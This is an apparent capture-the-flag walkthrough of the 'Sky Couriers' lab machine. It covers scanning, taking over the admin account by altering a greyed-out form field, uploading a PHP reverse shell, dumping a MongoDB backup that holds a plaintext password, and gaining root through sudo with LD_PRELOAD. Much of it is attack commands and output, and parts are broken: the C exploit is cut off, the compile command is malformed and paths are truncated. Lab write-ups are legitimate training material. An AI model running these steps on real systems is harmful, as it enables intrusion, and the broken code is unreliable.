We don't know anything about the machine yet, and CTF description doesn't reveal anything either, so let's start with an aggressive NMAP scan.

NMAP output
Starting Nmap 7.92 ( ) at 2021-12-23 00:59 CET
Warning: giving up on port because retransmission cap hit (2).
Nmap scan report for
Host is up (0.039s latency).
Not shown: 65533 closed tcp ports (reset)
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e6:dc:88:69:de:a1:73:8e:84:5b:a1:3e:27:9f:07:24 (RSA)
|   256 6b:ea:18:5d:8d:c7:9e:9a:01:2c:dd:50:c5:f8:c8:05 (ECDSA)
|_  256 ef:06:d7:e4:b1:65:15:6e:94:62:cc:dd:f0:8a:1a:24 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Sky Couriers
|_http-server-header: Apache/2.4.41 (Ubuntu)
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 554/tcp)
1   39.14 ms
2   39.27 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 53.45 seconds

Well, that really doesn't reveal much; pretty standard stuff.

Navigating a bit through the website I can't really find anything suspicious yet either, so let's throw a gobuster scan and see if we can get something.

gobuster dir -w directories.txt -u
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 30
[+] Wordlist:                directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2021/12/23 01:05:40 Starting gobuster in directory enumeration mode
Progress: 136645 / 220561 (61.95%)^C
[!] Keyboard interrupt detected, terminating.

2021/12/23 01:08:50 Finished

Again, nothing special.

After reading some more source code, I coulnd't locate anything. So let's move onto actually using the website.


After running gobuster again with a bigger wordlist, it finally found a register.html endpoint in /v2/admin. So let's try and see what we can do once logged in.

So we are greeted with a nicely designed dashboard, and going in my profile we are able to change some parameters of our account. But not image, as that looks like it's reserved for admin only. In the meanwhile, looks like they also leaked his email, so we will save that for later.

Digging a bit more, we see there's a reset user functionality that let's you change password, while username is greyed out. We all know greying a field in a form isn't enough to block malicious input though, as hackers can easily modify requests through burpsuite, so let's fire it.


Now we know the admin email, so let's try changing ours to that modifying the request with burpsuite repeater.

And looks like we are succesful, let's try to log in as now admins.

Worked, now let's abuse this image uploading tool to hopefully upload a php (as we already know this is what the backend uses) reverse shell and get access to the server.

I always get my php reverse shell from here, but you can use any.

Well, looks like it worked, as there is no negative feedback from the page.

Reading the source code, it exposes an important endpoint for this through a comment, and it is "/v2/profileimages/", so we can only guess we have to start a listener and navigate to "/v2/profileimages/ReverseShellName.php" to invoke the shell

Gaining foothold
Connection from
Linux sky 5.4.0-73-generic #82-Ubuntu SMP Wed Apr 14 17:39:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 00:40:10 up 44 min,  0 users,  load average: 0.62, 0.22, 0.10
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@sky:/$ export TERM=xterm; export SHELL=/bin/bash
export TERM=xterm; export SHELL=/bin/bash
www-data@sky:/$ ^Zfish: Job 1, 'nc -lvp 1337' has stopped
max@1337 ~> stty raw -echo;fg
Send job 1, “nc -lvp 1337” to foreground


Finally we are in, you can go and grab the user flag at /home/webdeveloper/, but we need to do some lateral movement and get a real user instead of www-data, so let's move into privilege escalation.

Privilege Escalation

Looking at /etc/shadow, we can see there's a mongodb user, so let's see if we have access to the database.

Execute mongo in terminal
> show dbs
shshow dbs
admin   0.000GB
backup  0.000GB
config  0.000GB
local   0.000GB
> use backup
ususe backup
switched to db backup
> show collections
shshow collections
> db.user.find();
{ "_id" : ObjectId("60ae2661203d21857b184a76"), "Month" : "Feb", "Profit" : "25000" }
{ "_id" : ObjectId("60ae2677203d21857b184a77"), "Month" : "March", "Profit" : "5000" }
{ "_id" : ObjectId("60ae2690203d21857b184a78"), "Name" : "webdeveloper", "Pass" : "BahamasChapp123!@#" }
{ "_id" : ObjectId("60ae26bf203d21857b184a79"), "Name" : "Rohit", "EndDate" : "December" }
{ "_id" : ObjectId("60ae26d2203d21857b184a7a"), "Name" : "Rohit", "Salary" : "30000" }
> exit
Error saving history file: FileOpenFailed Unable to open() file /var/www/.dbshell: Permission denied
www-data@sky:/var/www/html$ su webdeveloper
su webdeveloper
Password: BahamasChapp123!@#


Lateral movement was succesful, now let's see if we can get root this time.

Looking at sudo -l output, there's something suspicious I notice other than the binary we can execute as sudo, and it is the LD_PRELOAD environment variable.

Looking at this article, it looks like it could be vulnerable, so let's try their C code example.

#include [stdio.h]
#include [sys/types.h]
#include [stdlib.h]
void _init() {
Compiling and executing
gcc -fPIC -shared -o exploit.c -nostartfiles
exploit.c: In function ‘_init’:
exploit.c:6:1: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
    6 | setgid(0);
      | ^~~~~~
exploit.c:7:1: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
    7 | setuid(0);
      | ^~~~~~
webdeveloper@sky:/tmp$ sudo -l
sudo -l
Matching Defaults entries for webdeveloper on sky:
    env_reset, mail_badpass,

User webdeveloper may run the following commands on sky:
    (ALL : ALL) NOPASSWD: /usr/bin/sky_backup_utility
webdeveloper@sky:/tmp$ sudo LD_PRELOAD=/tmp/ /usr/bin/sky_backup_utility
sudo LD_PRELOAD=/tmp/ /usr/bin/sky_backup_utility
# id
uid=0(root) gid=0(root) groups=0(root)

And that's it, now just go and grab root flag. Hope you enjoyed it!